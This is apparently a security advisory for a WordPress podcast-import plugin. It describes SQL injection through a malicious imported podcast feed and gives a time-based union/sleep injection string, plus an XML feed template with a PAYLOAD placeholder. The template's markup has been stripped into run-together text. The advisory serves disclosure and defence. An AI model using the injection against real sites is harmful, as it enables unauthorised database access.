The plugin does not sanitise and properly escape some imported data, which could allow SQL injection attacks to be performed by imported a malicious podcast file
Put the XML below on a web server (replacing the PAYLOAD with the correct one), then import a podcast (/wp-admin/tools.php?page=secondlinepodcastimport) and put the URL to the XML in the Podcast Feed URL field and click import Payloads: v < 1.3.0 - https://satchmo.secondlinethemes.com/?p=82%') union select (sleep(10));# v < 1.3.8 - Dixie WordPress Theme https://dixie.secondlinethemes.com/ A Powerful Podcasting Theme Mon, 09 Nov 2020 10:08:04 +0000 en-US Ā© 2021 Dixie WordPress Theme A Powerful Podcasting Theme Dixie WordPress Theme A Powerful Podcasting Theme Dixie WordPress Theme [email protected] clean Dixie WordPress Theme [email protected] A Powerful Podcasting Theme No Episode 10: New Recording Studios https://dixie.secondlinethemes.com/podcast/episode-10-new-recording-studios/ Wed, 24 Jul 2019 11:16:50 +0000 Dixie PAYLOAD clean no 02:16 Dixie No no